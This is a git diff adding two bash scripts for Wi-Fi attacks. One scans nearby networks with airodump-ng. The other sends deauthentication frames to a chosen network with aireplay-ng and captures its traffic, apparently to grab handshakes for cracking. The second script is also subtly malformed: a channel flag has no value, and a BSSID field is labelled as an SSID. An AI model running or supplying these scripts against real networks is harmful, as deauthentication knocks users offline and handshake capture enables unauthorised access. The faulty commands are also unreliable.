diff --git a/scouting.sh b/scouting.sh new file mode 100644 index 0000000..ff74060 --- /dev/null +++ b/scouting.sh @@ -0,0 +1,5 @@ +#!/usr/bin/bash +airmon-ng start wlan1 6 +timeout 30 airodump-ng --write networks --output-format csv wlan1mon +airmon-ng stop wlan1mon +systemctl start NetworkManager \ No newline at end of file diff --git a/sniffing.sh b/sniffing.sh new file mode 100644 index 0000000..a5897a9 --- /dev/null +++ b/sniffing.sh @@ -0,0 +1,5 @@ +#!/usr/bin/bash +airmon-ng start wlan1 6 +aireplay-ng --deauth 5 -a [Network SSID here] wlan1mon && timeout 75s airodump-ng -c --bssid [Network SSID here] -w packets wlan1mon +airmon-ng stop wlan1mon +reboot \ No newline at end of file